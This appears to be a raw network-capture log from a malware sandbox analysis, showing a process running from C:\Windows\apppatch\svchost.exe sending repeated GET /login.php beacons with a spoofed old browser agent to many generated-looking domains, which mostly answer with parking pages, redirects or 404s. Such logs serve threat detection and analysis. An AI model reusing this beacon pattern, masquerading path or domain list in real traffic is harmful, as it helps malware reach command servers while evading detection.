Nov 11, 2024 18:24:18.913028002 CET | 816 | IN | HTTP/1.1 200 OK
server: nginx/1.18.0 (Ubuntu)
date: Mon, 11 Nov 2024 17:24:18 GMT
content-type: text/html
content-length: 593
last-modified: Wed, 22 Feb 2023 21:25:52 GMT
etag: "63f68860-251"
accept-ranges: bytes
Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 49741 | 72.52.179.174 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:18.589803934 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 49742 | 72.52.179.174 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:19.121463060 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
31 | 192.168.2.8 | 53598 | 52.34.198.229 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:21.955452919 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lygyvuj.com
Nov 11, 2024 18:24:22.641503096 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:24:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5fa3d5393dc8155eea2e62ba2018e8a3|66.23.206.109|1731345862|1731345862|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.8 | 59357 | 44.221.84.105 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:24.964730024 CET | 243 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gahyhiz.com
Nov 11, 2024 18:24:25.392695904 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Nov 2024 17:24:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9da7769b195a1202f359e138b28cbd50|66.23.206.109|1731345865|1731345865|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.8 | 63205 | 199.59.243.227 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:26.854317904 CET | 305 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vojyqem.com
Cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679
Nov 11, 2024 18:24:27.368000031 CET | 1236 | IN | HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:24:26 GMT
content-type: text/html; charset=utf-8
content-length: 1094
x-request-id: 3f096185-671b-4a18-b6f2-0a3f12916379
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
set-cookie: parking_session=244ca17e-8cf9-4dfe-af64-36b71a041679; expires=Mon, 11 Nov 2024 17:39:27 GMT
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368007898 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                          Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjQ0Y2ExN2UtOGNmOS00ZGZlLWFmNjQtMzZiNzFhMDQxNjc5IiwicGFnZV90aW1lIjoxNzMxMzQ1ODY3LCJwYWdlX3VybCI6Imh0dHA6L
                                                                                                                                                                                                          Nov 11, 2024 18:24:27.368019104 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                          Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjQ0Y2ExN2UtOGNmOS00ZGZlLWFmNjQtMzZiNzFhMDQxNjc5IiwicGFnZV90aW1lIjoxNzMxMzQ1ODY3LCJwYWdlX3VybCI6Imh0dHA6L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.8 | 63206 | 23.253.46.64 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:26.897006035 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Nov 11, 2024 18:24:27.368032932 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:21 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:24:27.368045092 CET | 169 | IN
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.8 | 63207 | 85.17.31.82 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:26.897295952 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.8 | 63208 | 75.2.71.199 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:27.036457062 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
Nov 11, 2024 18:24:27.462372065 CET | 166 | IN | HTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Location: https://puzylyp.com/login.php
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:27 GMT
                                                                                                                                                                                                          Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.8 | 63209 | 85.17.31.82 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:27.386780977 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 63210 | 23.253.46.64 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:27.421636105 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gahyqah.com
Nov 11, 2024 18:24:27.878686905 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Server: Microsoft-IIS/7.5
                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:22 GMT
                                                                                                                                                                                                          Content-Length: 1245
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:24:27.878726959 CET | 169 | IN
                                                                                                                                                                                                          Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 61825 | 103.224.182.252 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:37.022259951 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
Nov 11, 2024 18:24:37.589415073 CET | 242 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20241112-0424-3743-a98f-0148015a85a2
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 61826 | 103.224.212.210 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:37.076800108 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
Nov 11, 2024 18:24:37.627923965 CET | 244 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:37 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0424-3729-8680-cf4058033ce0
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 61827 | 64.190.63.136 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:24:37.599100113 CET | 348 | OUT | GET /login.php?sub1=20241112-0424-3743-a98f-0148015a85a2 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
                                                                                                                                                                                                          Nov 11, 2024 18:24:38.265906096 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:24:38 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ZpUyBsvWeb9ETF6HHS7dQ30lDdRFS5bcXTW45aRwuOYixiQ2ZB7H37Moh8ypy7GCq6CNEpeGjL44L2kAJVsBtg==
                                                                                                                                                                                                          last-modified: Mon, 11 Nov 2024 17:24:38 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7596689c44-jngxs
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_ZpUyBsvWeb9ETF6HHS7dQ30lDdRFS5bcXTW45aRwuOYixiQ2ZB7H37Moh8ypy7GCq6CNEpeGjL44L2kAJVsBtg==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes


Session ID  Source IP    Source Port  Destination IP  Destination Port
42          192.168.2.8  61828        199.59.243.227  80
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:24:37.645051003 CET  404                OUT        GET /login.php?subid1=20241112-0424-3729-8680-cf4058033ce0 HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww25.lyxynyx.com
Connection: Keep-Alive
Cookie: __tad=1731345856.5241611; parking_session=a5572c25-6032-467b-b015-10575c4e4ea5
Nov 11, 2024 18:24:38.072262049 CET  1236               IN         HTTP/1.1 200 OK
date: Mon, 11 Nov 2024 17:24:37 GMT
content-type: text/html; charset=utf-8
content-length: 1230
x-request-id: 32629e49-5042-4249-af91-fe63c7c02664
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_WZ/4eNcc8on8jlCpj1eGWWuK9XsutLntpAdjHD3FZ7soukl0OKukVBSnjQ9ekL6NU/H4FRChnILsiqMVZlSVXg==
set-cookie: parking_session=a5572c25-6032-467b-b015-10575c4e4ea5; expires=Mon, 11 Nov 2024 17:39:38 GMT
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_WZ/4eNcc8on8jlCpj1eGWWuK9XsutLntpAdjHD3FZ7soukl0OKukVBSnjQ9ekL6NU/H4FRChnILsiqMVZlSVXg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
Nov 11, 2024 18:24:38.072458029 CET  656                IN
                                                                                                                                                                                                          Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTU1NzJjMjUtNjAzMi00NjdiLWIwMTUtMTA1NzVjNGU0ZWE1IiwicGFnZV90aW1lIjoxNzMxMzQ1ODc4LCJwYWdlX3VybCI6Imh0dHA6L


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
43          192.168.2.8  64830        72.52.179.174   80                1736  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:24:39.420017958 CET  243                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
44          192.168.2.8  49312        72.52.179.174   80                1736  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:24:39.951400042 CET  243                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyhub.com


Session ID  Source IP    Source Port  Destination IP  Destination Port
45          192.168.2.8  62047        199.191.50.83   80
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:25:05.315481901 CET  281                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galyqaz.com
Cookie: vsid=904vr478891445443024397


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
46          192.168.2.8  53519        208.100.26.245  80                1736  C:\Windows\apppatch\svchost.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 11, 2024 18:25:53.916307926 CET  243                OUT        GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvyxor.com
Nov 11, 2024 18:25:54.360356092 CET  744                IN         HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Nov 2024 17:25:54 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 11, 2024 18:25:54.363251925 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyvyxor.com
Nov 11, 2024 18:25:54.576749086 CET | 744 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:25:54 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 580
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 53520 | 85.17.31.82 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:53.917817116 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 53521 | 199.59.243.227 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:25:53.926698923 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vojyqem.com
Nov 11, 2024 18:25:54.352050066 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:25:53 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1094
                                                                                                                                                                                                          x-request-id: 3581daf9-42cf-4c3e-921a-5d98ff1008f3
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
